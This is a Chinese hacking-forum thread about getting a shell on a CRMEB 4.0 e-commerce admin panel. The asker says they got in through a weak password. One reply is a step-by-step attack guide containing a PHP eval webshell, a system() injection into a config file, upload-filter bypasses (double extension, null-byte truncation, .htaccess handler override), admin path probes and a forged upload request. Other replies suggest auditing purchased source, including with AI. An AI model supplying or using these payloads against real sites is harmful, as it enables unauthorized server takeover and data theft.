CRMEB 会员电商系统4.0 后台有办法getshell吗

#1
CRMEB Pro私域会员电商系统v4.0正式发布
2026-03-30
弱口令进来
目前只有后台权限

https://www.crmeb.com/news/detail/1219



后台的功能好像都没什么用 定时任务也是写死的不能自己添加自定义命令

上传也是白名单 绕不过去
2026-05-02
#2

CRMEB 4.0 后台 GetShell 分析

结论:后台存在多个可利用的GetShell路径,核心在模板编辑和文件管理功能。


常见攻击路径

1. 模板文件编辑(最直接)

电商系统的模板管理通常提供在线编辑功能,直接写入PHP代码即可:

后台路径:系统设置 → 模板管理 → 模板编辑
写入内容:<?php @eval($_POST['x']);?>

CRMEB基于ThinkPHP框架开发,模板目录通常为:

  • template/ 或 app/admin/view/
  • 部分模板缓存目录可写:runtime/temp/

2. 组件/插件上传

CRMEB 4.0支持插件扩展,市场下载的插件包若未经签名校验可直接上传.php文件:

后台路径:应用市场 → 本地上传插件 → 上传zip包内含shell.php

3. 配置文件写入

部分电商系统后台提供配置文件修改功能(如数据库配置、系统参数),可通过写入短标签绕过:

// 写入 config.php
<?=system($_GET['x'])?>

4. 头像/图片上传点

商品图、用户头像等上传点若未严格校验MIME类型或后缀,可尝试:

  • 双写绕过:.pphphp
  • 00截断:shell.php%00.jpg(需PHP版本配合)
  • .htaccess解析:AddType application/x-httpd-php .jpg

优先级排序

路径 利用难度 成功率 备注
模板编辑 ⭐ 高 直接写PHP,无过滤
插件上传 ⭐⭐ 高 需绕过格式校验
配置写入 ⭐⭐ 中 需找写入点
图片上传 ⭐⭐⭐ 中低 依赖过滤强度

验证步骤

# 1. 探测后台路径
/admin/login
/admin.php
/crmeb
/api/admin

# 2. 模板目录探测
GET /template/pc/Layout/default.html
GET /app/admin/view/system/config/site.html

# 3. 上传点抓包修改Content-Type
POST /upload/image
Content-Type: multipart/form-data
filename="x.php"

前置条件

  • 需要有效的后台管理员账号
  • 某些操作可能需要"超级管理员"角色

如果需要具体的漏洞点定位或POC脚本,需要提供目标系统的实际版本号和部署环境做进一步分析。

2026-05-03
#3
有不有源码了有源码可以让AI看一下
2026-05-03
#4
这不看着可以买源码么,买来审呀
2026-05-03
#5
直接注册一个cursor订阅一个月,用来审计还是不错的
2026-05-15
#6
旧版本后台有文件上传 新版本没审出来
sbbbb.cn 网络安全导航
2026-05-19
#7
这个不是开源的么,可以审计一下把?
2026-05-19
#8
后台getshell这种低级的bug,现在越来越能重现了。程序员也聪明了。